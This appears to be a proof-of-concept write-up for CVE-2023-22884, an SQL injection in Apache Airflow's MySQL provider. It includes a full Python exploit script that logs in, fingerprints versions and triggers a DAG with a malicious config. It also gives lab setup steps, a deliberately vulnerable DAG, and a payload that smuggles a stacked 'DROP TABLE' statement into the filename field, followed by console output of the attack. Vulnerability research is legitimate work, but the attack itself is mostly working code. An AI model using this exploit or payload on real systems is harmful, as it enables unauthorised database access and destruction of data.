Summary
Proof of concept for CVE-2023-22884, an Apache Airflow SQL injection vulnerability.
# @jakabakos
# version: 1.1
# Tested with Airflow 2.5.0 and MySQL provider 3.4.0
# Apache Airflow REST API reference: https://airflow.apache.org/docs/apache-airflow/stable/stable-rest-api-ref.html

import argparse
import json
import os
import re

import requests
from packaging import version


def get_csrf_token(url):
    """Get the CSRF token from the login page response"""
    # Send a GET request to the login page to retrieve the HTML content
    response = requests.get(url + "/login/")

    # Use a regular expression to find the CSRF token in the response HTML
    pattern = r'<input(?:\s+(?:(?:type|name|id)\s*=\s*"[^"]*"\s*)+)?\s+value="([^"]+)">'
    csrf_token = re.search(pattern, response.text)

    # Extract the initial session cookie from the response
    initial_session_cookie = response.cookies.get('session')

    # If the CSRF token is found, return the session cookie and the token
    if csrf_token:
        print("[+] CSRF token found.")
        return initial_session_cookie, csrf_token.group(1)
    else:
        print("[-] CSRF token not found. Exiting...")
        exit(1)


def login(url, username, password, cookie, csrf_token):
    """Log in to the Apache Airflow web application"""
    # Prepare the login data with the CSRF token, username, and password
    data = {"csrf_token": csrf_token, "username": username, "password": password}

    # Send a POST request to the login page with the login data and session cookie
    response = requests.post(
        url + "/login/",
        headers={
            "Content-Type": "application/x-www-form-urlencoded",
            "Cookie": f"session={cookie}"
        },
        data=data
    )

    # Check if the login was successful or if there was an error
    if "Invalid login. Please try again." in response.text:
        print("[-] Login was not successful due to invalid credentials.")
        exit(1)
    elif response.status_code != 200:
        print("[-] Something went wrong with the login process. Exiting...")
        exit(1)
    elif "Set-Cookie" in response.headers:
        # If login was successful, extract the new session cookie from the response headers
        session_cookie = response.headers["Set-Cookie"].split(";")[0].split("=")[1]
        print(f"[+] Login was successful. Captured session cookie: {session_cookie}")
        return session_cookie
    else:
        print("[-] No session cookie was found in the login response. Exiting...")
        exit(1)


def verify_airflow_version(url, session_cookie):
    """Verify the version of Apache Airflow and check for vulnerability"""
    # Send a GET request to the Airflow home page to retrieve the HTML content
    response = requests.get(
        url + "/home",
        headers={"Cookie": f"session={session_cookie}"}
    )

    # Use a regular expression to find the version string in the response HTML
    version_str = re.search(r'v(\d+\.\d+\.\d+)', response.text)

    # Check if the version string is found in the response
    if version_str:
        print(f"[+] Airflow version found: {version_str.group(1)}")
    else:
        print("[-] Airflow version not found.")
        exit(1)

    # Check if the version is vulnerable (2.5.0 or below)
    if version.parse(version_str.group(1)) <= version.parse("2.5.0"):
        print("[+] Version is vulnerable.")
    else:
        print("[-] Airflow version is not vulnerable. Version is above 2.5.0. Exiting...")
        exit(1)


def verify_mysql_provider(url, session_cookie):
    """Verify the version of the MySQL provider and check for vulnerability"""
    # Send a GET request to get the list of providers from the Airflow API
    response = requests.get(
        f'{url}/api/v1/providers',
        headers={"Cookie": f"session={session_cookie}"}
    )
    data = response.json()
    providers = data.get("providers", [])

    # Loop through the list of providers and find the MySQL provider
    for provider in providers:
        if provider.get("package_name") == "apache-airflow-providers-mysql":
            # Check if the version of the MySQL provider is vulnerable (3.4.0 or below)
            if version.parse(provider.get("version")) <= version.parse("3.4.0"):
                print("[+] MySQL provider version is vulnerable.")
                return
            else:
                print("[-] MySQL provider version is not vulnerable. Exiting...")
                exit(1)

    # If the MySQL provider is not found in the list of providers, exit
    print("[-] MySQL provider not found. Exiting...")
    exit(1)


def verify_connection_id(url, session_cookie, connection_id):
    """Verify that the provided connection ID exists, or create a new connection from a JSON file"""
    # If the argument is not a path to a file, treat it as the ID of an existing connection
    if not os.path.isfile(connection_id):
        # Send a GET request to get the list of connections from the Airflow API
        response = requests.get(
            f'{url}/api/v1/connections',
            headers={"Cookie": f"session={session_cookie}"}
        )
        connections = response.json().get("connections", [])

        # Loop through the list of connections and check if the provided connection ID exists
        found = False
        for conn in connections:
            if conn.get("connection_id") == connection_id:
                # Check if the existing connection is of type "mysql"
                if conn.get("conn_type") == "mysql":
                    found = True
                else:
                    print("[-] The provided connection_id is not a 'mysql' type connection. Exiting...")
                    exit(1)
        if found:
            print(f"[+] Connection ID '{connection_id}' exists.")
            return
        else:
            print("[-] Submitted connection id does not exist. Exiting...")
            exit(1)

    # Otherwise, open it as a JSON file that contains the data for the new connection
    else:
        try:
            with open(connection_id, 'r') as f:
                conn_data = json.load(f)
            if not isinstance(conn_data, dict) or not all(key in conn_data for key in ["connection_id", "conn_type", "host", "login", "port", "password"]):
                print("[-] Invalid JSON format for connection data. Exiting...")
                exit(1)
            # Send a POST request to the Airflow API to create a new connection from the provided JSON data
            response = requests.post(
                url + "/api/v1/connections",
                headers={"Cookie": f"session={session_cookie}"},
                json=conn_data
            )

            # Check if the connection was successfully created
            if response.status_code == 200:
                print(f"[+] Connection was successfully created with name {conn_data['connection_id']}.")
                print("[+] This connection id should be used by the vulnerable DAG.")
            else:
                print("[-] Failed to create the connection. Exiting...")
                exit(1)
        except json.JSONDecodeError:
            print("[-] Failed to parse the JSON connection data. Exiting...")
            exit(1)


def verify_dag_id(url, session_cookie, dag_id):
    """Verify the existence of a provided DAG ID"""
    # Send a GET request to get the list of DAGs from the Airflow API
    response = requests.get(
        f'{url}/api/v1/dags',
        headers={"Cookie": f"session={session_cookie}"}
    )

    dags = response.json().get("dags", [])

    # Check if the provided DAG ID exists in the list of DAGs
    if any(dag.get("dag_id") == dag_id for dag in dags):
        print(f"[+] DAG id '{dag_id}' exists.")
    else:
        print("[-] DAG id does not exist. Exiting...")
        exit(1)


def trigger_dag(url, session_cookie, dag_id, file_path):
    """Trigger a DAG run with a provided configuration"""
    endpoint = f"{url}/api/v1/dags/{dag_id}/dagRuns"
    headers = {
        "Cookie": f"session={session_cookie}",
        "accept": "application/json"
    }

    # Read and parse the provided DAG config file (should be in JSON format)
    try:
        with open(file_path, 'r') as file:
            payload = json.load(file)
    except FileNotFoundError:
        print("[-] The DAG config file was not found. Exiting...")
        exit(1)
    except json.JSONDecodeError:
        print("[-] Failed to parse the DAG config JSON. Exiting...")
        exit(1)

    # Prepare the payload for the DAG run with the provided configuration
    data = {"conf": payload}

    # Send a POST request to trigger the DAG run with the payload configuration
    response = requests.post(endpoint, headers=headers, json=data)

    # Check if the DAG run was successfully triggered and is in the "queued" state
    if response.status_code == 200 and response.json().get("state") == "queued":
        print("[+] DAG successfully triggered with the provided payload.")
    else:
        print("[-] Failed to trigger the DAG. Response:")
        print(json.dumps(response.json(), indent=4))
        exit(1)


def main():
    # Usage examples shown at the bottom of the help output
    example_text = '''Examples:
    python3 exploit.py -u admin -p admin --host http://localhost:8080 --mode test -ci mysql -di bulk_load_from_file
    python3 exploit.py -u admin -p admin --host http://localhost:8080 --mode attack -ci mysql -di bulk_load_from_file -dc dag_config.json
    '''
    parser = argparse.ArgumentParser(
        description="CVE-2023-22884 Apache Airflow SQLi exploit script",
        epilog=example_text,
        formatter_class=argparse.RawDescriptionHelpFormatter
    )

    # Define the command-line arguments of the script
    parser.add_argument("-u", "--username", help="Airflow username.")
    parser.add_argument("-p", "--password", help="Airflow password.")
    parser.add_argument("-c", "--cookie", help="Authentication cookie.")
    parser.add_argument("--host", required=True, help="Host where Airflow is running (format: http(s)://host:port).")
    parser.add_argument("-m", "--mode", required=True, choices=["test", "attack"], help="The mode of the script: 'test' or 'attack'.")
    parser.add_argument("-ci", "--connection-id", help="The connection ID of the MySQL provider. Required in test mode only. Submit an existing connection ID as a string, or a path to a JSON file if the connection should be created.")
    parser.add_argument("-di", "--dag-id", help="The ID of the DAG to be exploited. Required in both modes.")
    parser.add_argument("-dc", "--dag-config-file", help="Path to a file that stores the DAG config JSON. Required in attack mode only.")

    args = parser.parse_args()

    # Check that either username and password or an authentication cookie is provided
    if (args.username and args.password) or args.cookie:
        url = args.host.rstrip("/")
        # Check that the URL starts with 'http://' or 'https://'
        if not url.startswith("http"):
            print("[-] Invalid URL format. Please use 'http' or 'https' as the schema. Exiting...")
            exit(1)

        # If no session cookie is provided, log in with the credentials and the CSRF token
        session_cookie = args.cookie
        if not session_cookie:
            initial_session_cookie, csrf_token = get_csrf_token(url)
            session_cookie = login(url, args.username, args.password, initial_session_cookie, csrf_token)

        if args.mode == "test":
            print("[+] Running in test mode.")
            if not args.connection_id or not args.dag_id:
                print("[-] Test mode requires --connection-id and --dag-id. Exiting...")
                exit(1)

            # Verify the version of Apache Airflow and check for vulnerability
            verify_airflow_version(url, session_cookie)

            # Verify the version of the MySQL provider and check for vulnerability
            verify_mysql_provider(url, session_cookie)

            # Verify the existence of the provided MySQL connection ID
            verify_connection_id(url, session_cookie, args.connection_id)

            # Verify the existence of the provided DAG ID
            verify_dag_id(url, session_cookie, args.dag_id)

            print("[+] Exploit successfully finished in test mode. Application is potentially VULNERABLE.")
            exit(0)

        elif args.mode == "attack":
            print("[+] Running in attack mode.")
            if not args.dag_id or not args.dag_config_file:
                print("[-] Attack mode requires --dag-id and --dag-config-file. Exiting...")
                exit(1)

            # Trigger the DAG run with the provided configuration
            trigger_dag(url, session_cookie, args.dag_id, args.dag_config_file)
            print("[+] Exploit successfully finished in attack mode.")
    else:
        # Neither credentials nor an authentication cookie were provided
        print("[-] Either username along with password or the authentication cookie is required. Exiting...")
        exit(1)


if __name__ == "__main__":
    main()
Description
Set up the PoC app
Install Docker and Docker Compose
Follow these instructions:
- Docker: https://docs.docker.com/desktop/install/debian/
- Docker Compose: https://docs.docker.com/compose/install/linux/
Install MySQL
To get a MySQL 8 server, run the following commands:
sudo apt update && sudo apt -y install wget
wget https://repo.mysql.com//mysql-apt-config_0.8.22-1_all.deb
sudo dpkg -i mysql-apt-config_0.8.22-1_all.deb
sudo apt update
sudo apt install mysql-server
One has to explicitly enable the LOAD DATA INFILE functionality in MySQL by setting a variable. The config file on our host machine is located at /etc/mysql/my.cnf. Add these lines to the bottom of the file:
[mysqld]
secure-file-priv = ""
Confirm that MySQL 8.0 was installed as expected:
mysql -u root -p
After entering the password, you should see the MySQL console.
Let’s create a table for testing purposes:
CREATE DATABASE airflow;
use airflow;
CREATE TABLE test (data varchar(255));
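Since secure_file_priv is only read at server startup, restart MySQL and confirm that the override took effect (the restart command assumes a systemd-based install; SHOW VARIABLES is standard MySQL):
sudo systemctl restart mysql
mysql -u root -p -e "SHOW VARIABLES LIKE 'secure_file_priv'; SHOW VARIABLES LIKE 'local_infile';"
An empty secure_file_priv value means the server does not restrict where LOAD DATA INFILE can read from.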
Install, configure, and run Airflow
We want to run Airflow in Docker together with a local MySQL server that we own.
The official docker-compose file works, but because the stock image of the affected Airflow version ships with a newer MySQL provider package, we have to put a custom install command into a Dockerfile. You can find both files here.
Download the file:
curl -LfO 'https://airflow.apache.org/docs/apache-airflow/2.5.0/docker-compose.yaml'
Then, uncomment the "build ." line in the docker-compose.yaml:
---
version: '3'
x-airflow-common:
&airflow-common
# In order to add custom dependencies or upgrade provider packages you can use your extended image.
# Comment the image line, place your Dockerfile in the directory where you placed the docker-compose.yaml
# and uncomment the "build" line below, Then run `docker-compose build` to build the images.
image: ${AIRFLOW_IMAGE_NAME:-apache/airflow:2.5.0}
build: . # UNCOMMENTED LINE HERE
environment:
&airflow-common-env
AIRFLOW__CORE__EXECUTOR: CeleryExecutor
AIRFLOW__DATABASE__SQL_ALCHEMY_CONN: postgresql+psycopg2://airflow:airflow@postgres/airflow
# For backward compatibility, with Airflow <2.3
AIRFLOW__CORE__SQL_ALCHEMY_CONN: postgresql+psycopg2://airflow:airflow@postgres/airflow
AIRFLOW__CELERY__RESULT_BACKEND: db+postgresql://airflow:airflow@postgres/airflow
AIRFLOW__CELERY__BROKER_URL: redis://:@redis:6379/0
AIRFLOW__CORE__FERNET_KEY: ''
AIRFLOW__CORE__DAGS_ARE_PAUSED_AT_CREATION: 'true'
AIRFLOW__CORE__LOAD_EXAMPLES: 'true'
AIRFLOW__API__AUTH_BACKENDS: 'airflow.api.auth.backend.basic_auth'
_PIP_ADDITIONAL_REQUIREMENTS: ${_PIP_ADDITIONAL_REQUIREMENTS:-}
volumes:
- ./dags:/opt/airflow/dags
- ./logs:/opt/airflow/logs
- ./plugins:/opt/airflow/plugins
user: "${AIRFLOW_UID:-50000}:0"
depends_on:
&airflow-common-depends-on
redis:
condition: service_healthy
postgres:
condition: service_healthy
[REDACTED]
Also add the install command to a Dockerfile located in the same folder as the docker-compose.yaml file.
FROM apache/airflow:2.5.0
RUN pip install apache-airflow-providers-mysql==3.4.0
Additionally, we have to initialize the Airflow environment. As the official tutorial says, "On Linux, the quick-start needs to know your host user id and needs to have group id set to 0. Otherwise the files created in dags, logs and plugins will be created with root user ownership." So run the following commands:
mkdir -p ./dags ./logs ./plugins ./config
echo -e "AIRFLOW_UID=$(id -u)" > .env
Don’t forget to initialize the database with docker compose up airflow-init.
Now build and run Airflow:
docker-compose up --build
As a result, you should see in the logs that the webserver and the other components are up, and that there is a login form at localhost:8080.
The default username and password is airflow.
As a final step, we can check whether the vulnerable provider version was installed successfully with this one-liner:
docker exec -it `docker ps | grep webserver | cut -d " " -f1` bash -c "pip freeze | grep apache-airflow-providers-mysql"
The output should be apache-airflow-providers-mysql==3.4.0.
As a next step, set up a connection for testing purposes under the Admin / Connections menu.
Fill in the necessary data to connect to our local MySQL server:
- Connection Id: mysql
- Connection type: MySQL
- Host: localhost
- Schema: airflow
- Login: root (can be any other user based on your MySQL configuration)
- Password: the password to connect to the MySQL server
- Port: 3306
- Extra: {"local_infile": true}
Lastly, unpause the "bulk_load_from_file" DAG in the list.
Set up a DAG
The vulnerable code segment is in the MySQL provider's bulk_load method, so we need a DAG that uses this method. Let's create one for the proof of concept.
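For reference, this is roughly what the vulnerable method looks like in provider 3.4.0 (paraphrased from the provider source; the exact formatting may differ): both arguments are interpolated into the SQL string without any escaping.
def bulk_load(self, table: str, tmp_file: str) -> None:
    """Load a tab-delimited file into a database table."""
    conn = self.get_conn()
    cur = conn.cursor()
    cur.execute(
        f"""
        LOAD DATA LOCAL INFILE '{tmp_file}'
        INTO TABLE {table}
        """
    )
    conn.commit()
    conn.close()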
Below is an example DAG that calls the vulnerable method. This Airflow DAG, named "bulk_load_from_file", is designed to bulk load data from a file into a MySQL database.
from datetime import datetime
from airflow import DAG
from airflow.operators.python_operator import PythonOperator
from airflow.operators.python import get_current_context
from airflow.hooks.mysql_hook import MySqlHook

def get_file_name():
    """Get the user-supplied filename to load into the database from the context"""
    context = get_current_context()
    return context["params"].get("filename", "test_file")

def get_table_name():
    """Get the user-supplied table name"""
    context = get_current_context()
    return context["params"].get("table_name", "test_table")

def bulk_load_sql(**kwargs):
    """Call the hook's bulk_load method to load the file content into the database"""
    conn = MySqlHook(mysql_conn_id='mysql')
    get_filename = get_file_name()
    get_tablename = get_table_name()
    conn.bulk_load(table=get_tablename, tmp_file=get_filename)

# Define the DAG
dag = DAG(
    "bulk_load_from_file",
    start_date=datetime(2023, 7, 1),
    schedule_interval=None)

# Define the operator that calls the method to bulk load
t1 = PythonOperator(
    task_id='bulk_load',
    provide_context=True,
    python_callable=bulk_load_sql,
    dag=dag)

# Reference the operator so it is registered with the DAG
t1
Save this file as bulk_load_from_file.py into the ./dags folder, which is mounted into the containers. A high-level overview of the file:
- get_file_name() and get_table_name() are Python functions defined to retrieve the user-supplied parameters "filename" and "table_name" from the context using get_current_context(). If the parameters are not provided, the default values "test_file" and "test_table" are used, respectively.
- bulk_load_sql(**kwargs) is a Python function that serves as the core task. It uses MySqlHook to establish a connection to the MySQL database with the connection ID "mysql" (assuming it is defined in the Airflow connections). It then calls the bulk_load() method of the hook, passing the table name obtained from get_table_name() and the filename obtained from get_file_name() to load the content of the file into the specified database table. The injection point is the filename parameter coming from the context.
- t1 is a PythonOperator that calls the bulk_load_sql function when the task is triggered.
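To see this parameter flow end to end without the exploit script, the same DAG can be triggered through the stable REST API (basic auth assumed, as enabled in the compose file); with the default dag_run_conf_overrides_params setting, the conf object is merged into context["params"] inside the tasks:
curl -X POST "http://localhost:8080/api/v1/dags/bulk_load_from_file/dagRuns" \
  -H "Content-Type: application/json" \
  --user "airflow:airflow" \
  -d '{"conf": {"filename": "/tmp/test_file", "table_name": "test"}}'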
Exploitation
See the options of the exploit by running it with -h:
kali# python3 exploit.py -h
usage: exploit.py [-h] [-u USERNAME] [-p PASSWORD] [-c COOKIE] --host HOST -m {test,attack} [-ci CONNECTION_ID] [-di DAG_ID] [-dc DAG_CONFIG_FILE]
CVE-2023-22884 Apache Airflow SQLi exploit script
options:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
Airflow username.
-p PASSWORD, --password PASSWORD
Airflow password.
-c COOKIE, --cookie COOKIE
Authentication cookie.
--host HOST Host where Airflow is running (format: http(s)://host:port).
-m {test,attack}, --mode {test,attack}
The mode of the script: 'test' or 'attack'.
-ci CONNECTION_ID, --connection-id CONNECTION_ID
The connection ID of the MySQL provider. Required in test mode only. Submit an existing connection ID as a string, or a path to a JSON
file if the connection should be created.
-di DAG_ID, --dag-id DAG_ID
The ID of the DAG to be exploited. Required in both modes.
-dc DAG_CONFIG_FILE, --dag-config-file DAG_CONFIG_FILE
Path to a file that stores the DAG config JSON. Required in attack mode only.
Examples:
python3 exploit.py -u admin -p admin --host http://localhost:8080 --mode test -ci mysql -di bulk_load_from_file
python3 exploit.py -u admin -p admin --host http://localhost:8080 --mode attack -ci mysql -di bulk_load_from_file -dc dag_config.json
Test mode
Let’s run our script in test mode first:
kali# python3 exploit.py -u admin -p admin --host http://localhost:8080 --mode test -ci mysql -di bulk_load_from_file
[+] CSRF token found.
[+] Login was successful. Captured session cookie: 64a9c813-e006-43e0-9c86-5877d0114491.2TxBJcJw4gH_JBVed5An6Qyu5Bc
[+] Running in test mode.
[+] Airflow version found: 2.5.0
[+] Version is vulnerable.
[+] MySQL provider version is vulnerable.
[+] Connection ID 'mysql' exists.
[+] DAG id 'bulk_load_from_file' exists.
[+] Exploit successfully finished in test mode. Application is potentially VULNERABLE.
Attack mode
Then, let's run it in attack mode.
First, check the test table in the airflow MySQL database:
Create a dag_config.json that will be attached as the JSON config to the DAG trigger. The malicious injection is in the filename part.
dag_config.json:
{
"filename": "/tmp/test_file' INTO TABLE test; DROP TABLE test; --",
"table_name": "test"
}
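To see why this works, here is a minimal sketch of how the malicious filename lands in the SQL template (based on the bulk_load snippet shown earlier, simplified to one line): the stacked DROP TABLE statement rides in behind the legitimate LOAD DATA statement, and the trailing -- comments out the leftover of the template.
# Sketch: reconstruct the injected SQL from the payload (template assumed from the provider snippet above)
table = "test"
tmp_file = "/tmp/test_file' INTO TABLE test; DROP TABLE test; --"
query = f"LOAD DATA LOCAL INFILE '{tmp_file}' INTO TABLE {table}"
print(query)
# LOAD DATA LOCAL INFILE '/tmp/test_file' INTO TABLE test; DROP TABLE test; --' INTO TABLE test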
Then, run the script in attack mode:
# python3 exploit.py -u admin -p admin --host http://localhost:8080 --mode attack -ci mysql -di bulk_load_from_file -dc dag_config.json
[+] CSRF token found.
[+] Login was successful. Captured session cookie: c0ffe971-a21a-459d-be71-e938742ebbb2.e80LLzIs5n2PvttPfJIHBPjgIrc
[+] Running in attack mode.
[+] DAG successfully triggered with the provided payload.
[+] Exploit successfully finished in attack mode.
Wait a couple of seconds and then check if the exploit payload was successfully executed:
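For example, list the tables in the airflow database again; after a successful injection, the test table should be gone:
mysql -u root -p -e "USE airflow; SHOW TABLES;"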
Tadaaam!
Flowchart diagram
Join vsociety: https://vsociety.io/
Check out our Discord: https://discord.gg/sHJtMteYHQ